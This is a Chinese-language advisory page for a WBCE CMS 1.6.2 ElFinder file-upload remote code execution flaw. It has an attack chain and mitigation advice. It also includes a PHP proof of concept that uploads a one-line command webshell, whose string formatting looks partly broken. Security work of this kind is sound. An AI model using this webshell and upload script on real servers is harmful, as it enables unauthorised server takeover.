CVE-2024-58283 CVSS 8.8 高危

CVE-2024-58283 WBCE CMS 1.6.2 ElFinder文件管理器远程代码执行漏洞

披露日期: 2025-12-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-58283

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WBCE CMS

漏洞概述

WBCE CMS 1.6.2版本存在严重的远程代码执行漏洞，攻击者可通过ElFinder文件管理器上传恶意PHP文件从而在服务器上执行任意系统命令。该漏洞存在于elfinder连接器的文件上传功能中，攻击者利用文件上传验证不严格的缺陷，上传包含恶意代码的PHP WebShell文件，进而获得服务器的完全控制权。由于CVSS评分高达8.8且无需用户交互即可利用，对使用该版本CMS的网站构成严重威胁。攻击者首先需要拥有低权限用户账号即可利用此漏洞，属于典型的高危低复杂度攻击向量。

技术细节

该漏洞源于WBCE CMS 1.6.2中集成的ElFinder文件管理器组件的文件上传功能存在安全缺陷。ElFinder是一个流行的Web文件管理器，在WBCE CMS中被用于后台文件管理功能。问题出在elfinder连接器(elfinder connector)的PHP后端代码中，对用户上传的文件类型检查不充分，允许攻击者绕过文件扩展名和白名单限制，上传.php格式的恶意文件。攻击者只需构造一个包含PHP代码的恶意文件(如webshell)，通过elfinder的上传接口将其写入服务器可访问的目录。由于Web服务器配置允许执行.php文件，攻击者访问上传的恶意文件即可触发PHP代码执行，从而在服务器上执行任意系统命令，包括读取敏感配置文件、数据库连接信息等，甚至可以建立持久化后门。

攻击链分析

STEP 1

攻击者获取WBCE CMS 1.6.2的低权限用户账号

STEP 2

访问/admin/elfinder/connector.minimal.php文件管理器接口

STEP 3

构造包含PHP代码的恶意webshell文件

STEP 4

通过elfinder上传接口绕过文件类型检查上传shell.php

STEP 5

访问上传的webshell文件，发送带cmd参数的HTTP请求

STEP 6

服务器执行任意系统命令，攻击者获得服务器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2024-58283 PoC - WBCE CMS ElFinder RCE
// Authentication required with low privilege access

$target = 'http://target-site.com/admin/elfinder/connector.minimal.php';
$upload_path = '/var/www/html/media/'; // or any writable directory

// Create malicious PHP webshell
$webshell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>';

// Prepare multipart form data for file upload
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8));
$body = "--{$boundary}\r
";
$body .= 'Content-Disposition: form-data; name="upload[]"; filename="shell.php"\r
';
$body .= "Content-Type: application/x-php\r\n\r\n";
$body .= $webshell . "\r\n";
$body .= "--{$boundary}--\r\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target . '?cmd=upload&target=l1_Lw');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: multipart/form-data; boundary=' . $boundary,
    'Cookie: WBCE_SESSION=your_authenticated_session'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Upload Response: $response\n";
echo "Shell uploaded at: http://target-site.com/media/shell.php?cmd=id\n";
?>

影响范围

WBCE CMS 1.6.2

防御指南

临时缓解措施

立即将WBCE CMS升级到官方发布的安全更新版本。在等待更新期间，可临时禁用或限制ElFinder文件管理器功能，对上传目录设置禁止PHP执行(配置Apache: <Directory "/media"> php_admin_flag engine off </Directory> 或 nginx: location /media/ { deny all; })并加强用户权限管理，限制低权限用户访问文件管理功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表